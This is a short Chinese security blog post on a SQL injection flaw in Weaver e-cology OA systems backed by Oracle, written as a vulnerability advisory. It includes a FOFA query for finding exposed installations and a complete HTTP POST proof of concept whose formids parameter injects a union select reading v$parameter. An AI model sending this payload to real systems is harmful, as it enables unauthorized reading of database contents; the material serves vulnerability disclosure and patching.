本文作者:CreaT0ye(Timeline Sec核心成员)
本文共643字,阅读大约需要2分钟
0x00 简介
泛微提供了移动办公、微信办公、协同办公(OA)、流程管理、信息门户、知识管理、费控管理等功能,适用于手机和pc端,是当今比较主流的OA系统之一。
0x01 原理概述
该漏洞是由于OA系统的WorkflowCenterTreeData接口在收到用户输入的时候未进行安全过滤,oracle数据库传入恶意SQL语句,导致SQL漏洞。
0x02 影响范围
使用oracle数据库的泛微 e-cology OA 系统
0x03 环境搭建
在线环境(限今晚):
打赏(任意金额)+转发,联系作者获取
FOFA搜索:
app="泛微-协同办公OA"
自行搭建:
公众号内回复“泛微环境”
0x04 漏洞利用
找到oracle数据库的泛微OA系统后直接使用Poc(已公开)
如果不存在漏洞,则显示结果如下
如果漏洞存在,则会直接回显很多数据
简洁版Poc如下:(勿用于非法途径)
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+ ,application/ ;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 2236 Connection: close Upgrade-Insecure-Requests: 1 formids=11111111111)))%0a%0dunion select NULL,value from v$parameter order by (((1
0x05 修复建议
官网已更新补丁,请尽快更新。
参考链接:
https://mp.weixin.qq.com/s/gbr_iMRbcvGtzFenNah-lg
继续阅读与本文标签相同的文章
上一篇 :
微信小程序实时聊天WebSocket
-
美民主党竞选人就自动化问题展开激烈辩论
2026-05-15栏目: 教程
-
便利店的第三方物流配送探寻
2026-05-15栏目: 教程
-
整合全上海的一手联排+叠加,只有这些在售!
2026-05-15栏目: 教程
-
上天了,Docker容器已经上天了
2026-05-15栏目: 教程
-
根本停不下来!苹果发布iOS 13.2新测试版Beta 3
2026-05-15栏目: 教程
